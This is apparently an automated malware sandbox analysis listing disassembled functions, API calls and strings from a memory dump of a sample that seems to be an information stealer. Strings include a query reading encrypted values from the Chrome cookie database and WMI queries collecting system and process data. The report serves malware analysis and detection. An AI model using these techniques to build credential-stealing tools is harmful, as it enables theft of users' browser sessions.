Download Yara Rule

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(3A5313C3,00000002,7FFFFFFF,?,000000B0,?,00000000,00000000,00000000,Proccesses.txt), ref: 00430CCB
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(000000B0,3A5313C3,00000002,7FFFFFFF,?,000000B0,?,00000000,00000000,00000000,Proccesses.txt), ref: 00430D28
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,3A5313C3,00000002,7FFFFFFF,?,000000B0,?,00000000,00000000,00000000,Proccesses.txt), ref: 00430D51
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?,?,000000B0,?,00000000,00000000,00000000,Proccesses.txt), ref: 00430D77
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000,?,000000B0,?,00000000,00000000,00000000,Proccesses.txt), ref: 00430DD7
?uncaught_exception@std@@YA_NXZ.MSVCP140(?,000000B0,?,00000000,00000000,00000000,Proccesses.txt), ref: 00430DE4
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,000000B0,?,00000000,00000000,00000000,Proccesses.txt), ref: 00430DF3

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 1492985063-0
Opcode ID: 8f01a7dcef1e9a39cc76ac65a37a8e1f3b22ac5d2f51714bea5c6a8493bbee51
Instruction ID: dd8ae9a504881af2e4d958e33153ec6484f08f8df9cc5e074feab7c374d5c9ea
Opcode Fuzzy Hash: 8f01a7dcef1e9a39cc76ac65a37a8e1f3b22ac5d2f51714bea5c6a8493bbee51
Instruction Fuzzy Hash: 6B518034A00604CFDB14CF58C594BAABBF1BF4D314F24929AE8059B352C739ED46DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB70 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 004C81A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0000000F,0000000F,00000000,00000000,3A5313C3,0000000F), ref: 004C82BE

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,CommandLine,0000000B,3A5313C3), ref: 0040AC09
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,Name,00000004,?,00000000,?,CommandLine,0000000B,3A5313C3), ref: 0040AC85
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,ProcessId,00000009,?,00000000,?,Name,00000004,?,00000000,?,CommandLine,0000000B,3A5313C3), ref: 0040ACFA

Strings

Name, xrefs: 0040AC25
CommandLine, xrefs: 0040ABA9
ProcessId, xrefs: 0040ACA1

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove
String ID: CommandLine$Name$ProcessId
API String ID: 15630516-3112616376
Opcode ID: a5f1b5c633115d7b2a95ef9ecc233cb04a64f6dddb3b5747364c911c84ac0c04
Instruction ID: 1dc590a07f57af8cecc031a18da5abf5665d9b6ebae90ad1b4c97ac5b2eb4e61
Opcode Fuzzy Hash: a5f1b5c633115d7b2a95ef9ecc233cb04a64f6dddb3b5747364c911c84ac0c04
Instruction Fuzzy Hash: D94106719002089BEB14DFA8DD89BDEBBB6EF85314F10825DF011B72D1CB795E448B65

Uniqueness

Uniqueness Score: -1.00%

Function 0052040F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140(?,005553D0), ref: 00401B97
__std_exception_copy.VCRUNTIME140(?,?,Google Chrome,?,?,005553D0), ref: 00401BBE
_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520417
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424
_CxxThrowException.VCRUNTIME140(?,00554334,?), ref: 00521423

Strings

Google Chrome, xrefs: 00401BA3

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ExceptionThrow$__std_exception_copy_callnewhmalloc
String ID: Google Chrome
API String ID: 3601187372-3338836597
Opcode ID: 436d19756eb19109bc5a0aaa73a5a67ecbc776342f0a05b7bb7031700ba1dbf3
Instruction ID: 2339094577bb7217ac92718b7fac2f8c12e0dd8d86f16e4b655e5c74569dea9a
Opcode Fuzzy Hash: 436d19756eb19109bc5a0aaa73a5a67ecbc776342f0a05b7bb7031700ba1dbf3
Instruction Fuzzy Hash: F201083580021DA7CB04FBA8FC0998A7FACBF11354B608926FA14E61D2FB70F558C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 00457E60 Relevance: 9.6, APIs: 4, Strings: 2, Instructions: 622COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,0000002C), ref: 00457F4F
memmove.VCRUNTIME140(00000000,?,?), ref: 00458001
memset.VCRUNTIME140(00000000,00000000,00000054), ref: 00458196
memset.VCRUNTIME140(?,00000000,00000064,?,?,?,?,?,?,00000054), ref: 00458291

Strings

@OD, xrefs: 00458089, 004580BD, 00458471
:memory:, xrefs: 00457EBA

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memset$memmove
String ID: :memory:$@OD
API String ID: 3527438329-1752401443
Opcode ID: 8e0ee295e62500f22b822905085597965577e1062b03f1e64aace73cb8c8f657
Instruction ID: de7ccd58bf2ae23beabb777556b130950f4ce183f726d9afc1b5ee7920f92f48
Opcode Fuzzy Hash: 8e0ee295e62500f22b822905085597965577e1062b03f1e64aace73cb8c8f657
Instruction Fuzzy Hash: 6C32D271A002159FEB24CF28D855B6ABBB1AF45306F1841AEDC09AB343EF39DD48CB55

Uniqueness

Uniqueness Score: -1.00%

Function 005280F0 Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000088,00000007,00000000,00000003,02200000,00000000,?,?,3A5313C3,00000000,?,00000000), ref: 0052818F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000), ref: 005281CE
GetLastError.KERNEL32(?,00000000), ref: 005281FB
GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00528214
GetLastError.KERNEL32(?,00000000), ref: 00528243

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$AttributesCreate_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 4115598450-0
Opcode ID: ceebfe2ac0bfcaa277dded6deffe3b4a69a90f0ed78fdab6114e13179bb0e876
Instruction ID: 1d7221847f095e3c213917834396973df4acc7669e53c26ea4784231b6229e64
Opcode Fuzzy Hash: ceebfe2ac0bfcaa277dded6deffe3b4a69a90f0ed78fdab6114e13179bb0e876
Instruction Fuzzy Hash: 3651BC75901624EBDB14DFA8EC89BAEBBB4FF4A324F144519E805A73C1DB345A44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004055E0 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 004056B1
memmove.VCRUNTIME140(00000000,?,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 004056C2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 00405705
memmove.VCRUNTIME140(00000000,?,00000000,?,00000000), ref: 0040570D
memmove.VCRUNTIME140(7FFFFFFF,?,?,00000000,?,00000000,?,00000000), ref: 00405719

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

Concurrency::cancel_current_task.LIBCPMT ref: 00405739

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: a57103d688dfc5551bc619cb4b9e12a3bcb62dfe323ad7c6d66a3f1ad61edd4c
Instruction ID: b2b54ba866f9f6c5369ba788d6deef6060716f9e98951676320837d6b582ed4a
Opcode Fuzzy Hash: a57103d688dfc5551bc619cb4b9e12a3bcb62dfe323ad7c6d66a3f1ad61edd4c
Instruction Fuzzy Hash: 7B412272A000159BCB05EF68DC8096FBBA5FF85310F54067AE809FB381E6319D118B95

Uniqueness

Uniqueness Score: -1.00%

Function 00426860 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,3A5313C3,?,00000000,?,000000FF), ref: 0042689C

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

??0?$codecvt@_WDU_Mbstatet@@@std@@QAE@I@Z.MSVCP140(00000000,?,?,000000FF), ref: 00426905
?_New_Locimp@_Locimp@locale@std@@CAPAV123@ABV123@@Z.MSVCP140(?,?,?,000000FF), ref: 00426929
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,000000FF), ref: 0042693A
?_Addfac@_Locimp@locale@std@@AAEXPAVfacet@23@I@Z.MSVCP140(00000000,00000000,?,?,?,000000FF), ref: 00426944
??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP140(0054437C,?,?,?,000000FF), ref: 00426959

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Locimp@locale@std@@$??0?$codecvt@_??4?$_Addfac@_Bid@locale@std@@D@std@@Init@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_V01@V123@V123@@Vfacet@23@Yarn@malloc
String ID:
API String ID: 1257577214-0
Opcode ID: fc1807ecc9d64b17db1aa8985f073af37715de3855cd1f8659cd30fd17cd6bc9
Instruction ID: 382b061203748606baa77bf86341def8c44b48d2cfb3a9c2de51033822c15bd2
Opcode Fuzzy Hash: fc1807ecc9d64b17db1aa8985f073af37715de3855cd1f8659cd30fd17cd6bc9
Instruction Fuzzy Hash: 97418BB0600B41EFDB00CF64D848B5ABBF4FF08718F004169E5098BB91DBBAA958CF81

Uniqueness

Uniqueness Score: -1.00%

Function 004CAE60 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 004CFA80: EnterCriticalSection.KERNEL32(?,?,?,?,?,004D5B1C), ref: 004CFB7C
Part of subcall function 004CFA80: LeaveCriticalSection.KERNEL32(?,?,?,?,004D5B1C), ref: 004CFB8F
Part of subcall function 004CFA80: closesocket.WS2_32(?), ref: 004CFBD6
Part of subcall function 004CFA80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,004D5B1C), ref: 004CFBE7

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 004CAE9B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 004CAEB1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000001), ref: 004CAF31
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00008087), ref: 004CB150

Strings

Connection #%I64d to host %s left intact, xrefs: 004CB090

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: free$CriticalSection$EnterLeaveclosesocket
String ID: Connection #%I64d to host %s left intact
API String ID: 333628492-1408698375
Opcode ID: edf516ba2099193e510b6b9de8acdde4427e72071330743dc4959544a3492203
Instruction ID: 65b66fa2f8b88f403dcb486a9ddc5710132eb07f34b22a1e16bfab01e278071e
Opcode Fuzzy Hash: edf516ba2099193e510b6b9de8acdde4427e72071330743dc4959544a3492203
Instruction Fuzzy Hash: 8481C4B4600B44ABE771AB25CC4AFE7B7D4BF01309F04051FE59942282D7796964CBEB

Uniqueness

Uniqueness Score: -1.00%

Function 00414490 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 448COMMON

Download Yara Rule

Strings

\Temp\, xrefs: 0041355F, 004163F5
SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies, xrefs: 00414C9F
\Temp\tmp, xrefs: 004148CF, 00418A26

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@TimeU?$char_traits@memchr$??1?$basic_ios@??1?$basic_ostream@FileSystemmemmovememset
String ID: SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies$\Temp\$\Temp\tmp
API String ID: 4222108042-1047530102
Opcode ID: 423ade1e15436b7255420f5a8803eb534154b6867b60c22e18317cd6a7ee0bea
Instruction ID: 34ce011373ad07c0ae8a56da31ec92385a6cdca7bf1e4ff15d00746ebdbea70a
Opcode Fuzzy Hash: 423ade1e15436b7255420f5a8803eb534154b6867b60c22e18317cd6a7ee0bea
Instruction Fuzzy Hash: CB229B70D002689AEB24EB64CD4D7DEBBB1AF55308F5081DAD50827292DB785FC8CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00431C9B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

Select * From , xrefs: 00431D98
Win32_Process, xrefs: 00431D63

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID:
String ID: Select * From $Win32_Process
API String ID: 0-459675161
Opcode ID: 9188ee52c64012c3e1a67ffcdc08cfe7ad085503d31ffbca48454057a8b2b62f
Instruction ID: 423e038302bc72a350a0cc321257d49b7b6cf3d364ebdeb96bbf43676b495376
Opcode Fuzzy Hash: 9188ee52c64012c3e1a67ffcdc08cfe7ad085503d31ffbca48454057a8b2b62f
Instruction Fuzzy Hash: 73A1F071D042488BEB14CFA4C9497DDBBB1FF49304F20829EE445BB282DBB95A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00431CE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,7FFFFFFF), ref: 00431EA3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000), ref: 00431FF3

Strings

Select * From , xrefs: 00431D98
Win32_Process, xrefs: 00431D63

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID: Select * From $Win32_Process
API String ID: 2580228974-459675161
Opcode ID: 3ac74a00818b5f44049237e2a68238b1727d940dac28e85b3db5f05dad21966f
Instruction ID: e49dc760f2357f0f49f21c19e45b5356b0149ba23c7d342a53612a7efd521b33
Opcode Fuzzy Hash: 3ac74a00818b5f44049237e2a68238b1727d940dac28e85b3db5f05dad21966f
Instruction Fuzzy Hash: 5BA1B071D002588BEB14CFA8C9457DEFBB1FF49304F208259E455BB281DBB95A85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00431670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 200COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0043182C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 004318F3

Strings

Win32_VideoController, xrefs: 004316DD
Select * From , xrefs: 00431718

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID: Select * From $Win32_VideoController
API String ID: 2580228974-505105226
Opcode ID: 0358a122870beb86548aebac0c447cf3ea0192634cf1e0da2ed54213a86c6008
Instruction ID: 08ac2464828d94db5a6a7ad72b1292785e36e6afd7c8923fb1257d6f7208b0ea
Opcode Fuzzy Hash: 0358a122870beb86548aebac0c447cf3ea0192634cf1e0da2ed54213a86c6008
Instruction Fuzzy Hash: F6710271E001189BDB19EB64DD84BEEFBB9AF49304F10429EE404A72C1DB786F84CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00431040 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0000000F), ref: 004311BB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0000000F), ref: 004311FE

Strings

Win32_Processor, xrefs: 004310A2
Select * From , xrefs: 004310CE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID: Select * From $Win32_Processor
API String ID: 2580228974-1919120040
Opcode ID: a4f5598e38caf137dbdb8cf90947630b159d4670ac1fd364abf57f8a9538609e
Instruction ID: bdc05ca5e246834d560385838f347c39dd6e8f19dd5b96a87cb2803d4f0510f4
Opcode Fuzzy Hash: a4f5598e38caf137dbdb8cf90947630b159d4670ac1fd364abf57f8a9538609e
Instruction Fuzzy Hash: C8510571E012489BEF08DBA4DD49BDEBFB6EF89304F20825DE011AB2D1DB795A44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00431250 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000015), ref: 004313CB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000015), ref: 0043140E

Strings

Win32_OperatingSystem, xrefs: 004312B2
Select * From , xrefs: 004312DE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID: Select * From $Win32_OperatingSystem
API String ID: 2580228974-144415851
Opcode ID: f00c493249bed91b5307ea99c154141b95ecb264a537b9ecc21652d14b9b4615
Instruction ID: be9cdb2f49622e0fa8a5ee8ebba053c4372975050088747902005ca3efd30bb5
Opcode Fuzzy Hash: f00c493249bed91b5307ea99c154141b95ecb264a537b9ecc21652d14b9b4615
Instruction Fuzzy Hash: C3510371E002489BEB08DBA4DD89BDEFFB6EF85304F208219E411BB2D1DB795A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00431460 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000014), ref: 004315DB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000014), ref: 0043161D

Strings

Select * From , xrefs: 004314EE
Win32_ComputerSystem, xrefs: 004314C2

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID: Select * From $Win32_ComputerSystem
API String ID: 2580228974-3839358529
Opcode ID: eeae8c0939849f38c15195b80e5f2343d2c690913f593ebc8c0229e930bf7d4d
Instruction ID: f01c9bbb7d53ae40e0fa58c36f10779b9dfd7601848a59f16937b4d81277fcab
Opcode Fuzzy Hash: eeae8c0939849f38c15195b80e5f2343d2c690913f593ebc8c0229e930bf7d4d
Instruction Fuzzy Hash: 9951E571D012489BEB08DBA4DD89BDEFFB6EF85304F20821DE011AB2D1DB795A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00430E30 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000014), ref: 00430FAB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000014), ref: 00430FEE

Strings

Select * From , xrefs: 00430EBE
Win32_ComputerSystem, xrefs: 00430E92

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID: Select * From $Win32_ComputerSystem
API String ID: 2580228974-3839358529
Opcode ID: f1ce947be98069ccbcdba6f919cd65b5841da056ff024a86e1cad11440a61d9b
Instruction ID: 393ca7c5a6212bd8679b1f1ceac65460ef40ea044612e0e15549c128d54178d8
Opcode Fuzzy Hash: f1ce947be98069ccbcdba6f919cd65b5841da056ff024a86e1cad11440a61d9b
Instruction Fuzzy Hash: 39510571D002489BEB18DBA8DD49BDEFFB6EF45304F208219F011AB2D1DBB95A44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00512340 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00511F40: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo), ref: 00511F6E
Part of subcall function 00511F40: GetProcAddress.KERNEL32(00000000), ref: 00511F75

Part of subcall function 004E0DB0: GetModuleHandleA.KERNEL32(kernel32,?,?,security.dll,0051236D,security.dll,00000004,00000000,00000000,00000002,00000002,004E0FB4), ref: 004E0DBA

GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA), ref: 0051237F

Strings

security.dll, xrefs: 0051235F, 00512367
InitSecurityInterfaceA, xrefs: 00512379
secur32.dll, xrefs: 0051235A

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 1646373207-3788156360
Opcode ID: 866f38165def82c1cc2bda484caf4c48f40850ba6f7acdb0cd76b3216b75f13f
Instruction ID: 854269ac61049c99d7f3d9b557400f08f8abf2c5a7d524778d5eb6c2122b78c3
Opcode Fuzzy Hash: 866f38165def82c1cc2bda484caf4c48f40850ba6f7acdb0cd76b3216b75f13f
Instruction Fuzzy Hash: A0F092647803026BFF341BB05C57B993EB8B7A1706F408868BB15EA1C2EB7CCD459675

Uniqueness

Uniqueness Score: -1.00%

Function 00420700 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0042076C

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: malloc
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2803490479-1023437679
Opcode ID: 7292b20e24803922a2edaf3737f3ba362d76d6b1d473fe0916b76e1ed18933d7
Instruction ID: ff6084b8229cfa1f947d8936d4372eac2ee1e9a317d484507ba5caa07311e80c
Opcode Fuzzy Hash: 7292b20e24803922a2edaf3737f3ba362d76d6b1d473fe0916b76e1ed18933d7
Instruction Fuzzy Hash: 5D5102B0E012188BDB00DFA8DD45B9EFBB1EF45314F10826AE414A72C2EB785A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00424110 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

Part of subcall function 0052040F: _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520417
Part of subcall function 0052040F: _CxxThrowException.VCRUNTIME140(?,00554334,?), ref: 00521423

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000), ref: 00425B53

Strings

close, xrefs: 00424210
update, xrefs: 00424235

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ExceptionThrow_callnewh_invalid_parameter_noinfo_noreturnmalloc
String ID: close$update
API String ID: 209389800-487324430
